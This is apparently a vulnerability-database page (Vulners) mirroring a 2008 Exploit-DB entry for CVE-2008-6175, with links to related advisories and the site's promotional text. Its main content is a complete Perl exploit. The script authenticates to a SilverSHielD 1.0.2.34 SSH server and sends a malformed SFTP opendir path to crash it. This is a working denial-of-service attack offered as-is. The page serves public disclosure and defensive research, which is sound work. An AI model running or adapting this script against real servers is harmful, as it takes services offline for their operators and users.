Lucene search
+L

SilverSHielD 1.0.2.34 - Denial of Service

🗓️ 23 Oct 2008 00:00:00Reported by Jeremy BrownType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 57 Views

SilverSHielD Denial of Service exploit using Net::SSH

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6175
23 Oct 200800:00
circl
cve
CVE
CVE-2008-6175
19 Feb 200916:00
cve
cvelist
Cvelist
CVE-2008-6175
19 Feb 200916:00
cvelist
euvd
EUVD
EUVD-2008-6145
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6175
19 Feb 200916:30
nvd
prion
Prion
Command injection
19 Feb 200916:30
prion
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# SilverSHielD 1.0.2.34 DoS
use Net::SSH2;

$host     = "192.168.0.111";
$port     = 22;
$username = "test";
$password = "test123";
$dos      = "<<<<<<<<<<>>>>>>>>>>";

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)               || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->opendir($dos);
$ssh2->disconnect();
exit;

# milw0rm.com [2008-10-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.06077
57